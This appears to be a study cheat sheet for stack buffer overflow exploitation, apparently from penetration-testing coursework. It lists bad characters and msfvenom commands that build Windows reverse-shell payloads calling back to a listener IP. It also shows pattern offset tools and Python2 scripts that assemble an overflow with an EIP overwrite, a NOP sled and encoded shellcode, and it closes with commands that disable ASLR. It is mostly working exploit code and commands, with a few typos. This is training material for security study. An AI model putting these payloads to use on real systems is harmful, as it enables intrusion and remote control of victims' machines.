๐Buffer Overflow
Mona
reference
Bad Characters List (Python)
Common Bad Characters
\x00\x0a\x1a\x5f\xcd\xcf\x06\x3bList
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"Code
python2 -c "print ''.join([chr(i) for i in range(1,256)])" > exploit.txt
Reference
msfvenom
Code
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.243 LPORT=8898 -b "\x00\x0a\x1a\x39\x85"cmd.exe
Code
msfvenom -a x86 --platform Windows -p windows/exec CMD="cmd.exe" -b "\x00\x0a\x1a\x5f\xcd\xcf\x06\x3b" -f c /bin/sh
Code
msfvenom -p linux/x86/exec CMD=/bin/sh -b "\x00\x0a\x0d\x20\x37\xc2" > raw_shellcode MSF Pattern Create
Code
msf-pattern_create -l 1900MSF Pattern Offset
Code
msf-patter_offset -l 1900 -q 43346943For Loop "A"
Code
for i in {1..1812}; do echo -n "A" ; done > exploit.txtobjdump
Code
objdump -d <filename> | grep stringExample
dโโโ(eoใฟoffsec)-[~/pwk/bof]
โโ$ objdump -d vuln-app-windows.exe | grep "ff e4"
148011a8: ff e4 jmp *%espPython2 Write File
Code
data = b'\xC3\xA9'
with open("test.bin", "ab") as f:
f.write(data)#1/usr/bin/python2
buffer = "A" * 1812
eip = "\x30\x15\x40\x00"
with open("exploit.txt", "w") as f:
f.write(buffer + eip)Example
#!/usr/bin/python2
shellcode = (
"\x29\xc9\x83\xe9\xd0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
"\x80\xc2\x25\x04\x83\xee\xfc\xe2\xf4\x7c\x2a\xa7\x04\x80\xc2"
"\x45\x8d\x65\xf3\xe5\x60\x0b\x92\x15\x8f\xd2\xce\xae\x56\x94"
"\x49\x57\x2c\x8f\x75\x6f\x22\xb1\x3d\x89\x38\xe1\xbe\x27\x28"
"\xa0\x03\xea\x09\x81\x05\xc7\xf6\xd2\x95\xae\x56\x90\x49\x6f"
"\x38\x0b\x8e\x34\x7c\x63\x8a\x24\xd5\xd1\x49\x7c\x24\x81\x11"
"\xae\x4d\x98\x21\x1f\x4d\x0b\xf6\xae\x05\x56\xf3\xda\xa8\x41"
"\x0d\x28\x05\x47\xfa\xc5\x71\x76\xc1\x58\xfc\xbb\xbf\x01\x71"
"\x64\x9a\xae\x5c\xa4\xc3\xf6\x62\x0b\xce\x6e\x8f\xd8\xde\x24"
"\xd7\x0b\xc6\xae\x05\x50\x4b\x61\x20\xa4\x99\x7e\x65\xd9\x98"
"\x74\xfb\x60\x9d\x7a\x5e\x0b\xd0\xce\x89\xdd\xa8\x24\x89\x05"
"\x70\x25\x04\x80\x92\x4d\x35\x0b\xad\xa2\xfb\x55\x79\xd5\xb1"
"\x22\x94\x4d\xa2\x15\x7f\xb8\xfb\x55\xfe\x23\x78\x8a\x42\xde"
"\xe4\xf5\xc7\x9e\x43\x93\xb0\x4a\x6e\x80\x91\xda\xd1\xe3\xaf"
"\x41\x2a\xe5\xba\x40\x04")
filler = "A" * 1804
eip = "\xA8\x11\x80\x14"
offset = "C" * 4
nops = "\x90" * 10
with open("exploit.txt", "w") as f:
f.write(filler + eip + offset + nops + shellcode)EXITFUNC=thread
Code
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.4 LPORT=443 EXITFUNC=thread -f c โe x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\x3d"ASLR
Disable
Code
echo 0 | sudo tee /proc/sys/kernel/randomize_va_spaceEnable
Code
echo 2 | sudo tee /proc/sys/kernel/randomize_va_spaceNote:
This won't survive a reboot, so you'll have to configure this in sysctl. Add a file /etc/sysctl.d/01-disable-aslr.conf containing: kernel.randomize_va_space = 0 should permanently disable this.
Last updated